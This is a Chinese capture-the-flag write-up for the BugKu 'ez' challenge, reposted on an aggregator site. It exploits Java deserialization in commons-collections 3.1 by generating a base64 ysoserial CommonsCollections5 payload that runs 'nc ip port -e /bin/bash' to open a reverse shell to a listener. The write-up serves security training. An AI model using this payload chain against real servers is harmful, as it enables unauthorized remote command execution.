栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

[BugKu Web]ez

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

[BugKu Web]ez

本writeup已经在bugku开放

根据题意,显然是一道JAVA反序列化的题

关于JAVA反序列化漏洞的成因,参见博客https://zhuanlan.zhihu.com/p/422314689

此处只说明解题思路(重复开启场景已经没金币了,用本地环境说明)

下载附件,寻找存在反序列化漏洞的点

阅读pom.xml,发现存在commons-collections组件依赖,其3.1版本存在反序列化漏洞

阅读helloController.java,确定路由为ip:port/hello,状态码变成了400

需要输入请求参数name,注意name会经过base64解码 再进行反序列化,因此在传入参数之前需要对payload进行base64编码

payloiad的构造使用ysoserial,问就是没技术

推荐使用linux安装,具体参照https://blog.csdn.net/weixin_44769042/article/details/121378799(windows安装使用出现奇怪的问题)

查看可用组件漏洞及版本

	 java -jar ysoserial-0.0.6-SNAPSHOT-all.jar

选择CommonsCollections5,命令选择nc反弹shell,编码最好在这里进行,不然有奇怪的问题

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "nc ip port -e /bin/bash" |base64 -w0 >poc.bin`

如果构造payload的命令是无法执行的话(比如windows命令),则会输出something is wrong

在公网主机上开启监听

 nc -l -p port

将生成的payload作为name的value输入

在公网主机上ls一下,就可以看到flag,cat flag,over

如果本地可以却不能在靶场实现的话,需要注意的坑:必须使用公网ip才能被nc连接到,因此可能需要申请一个有公网ip的云服务器(我是这么做的)

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/830906.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号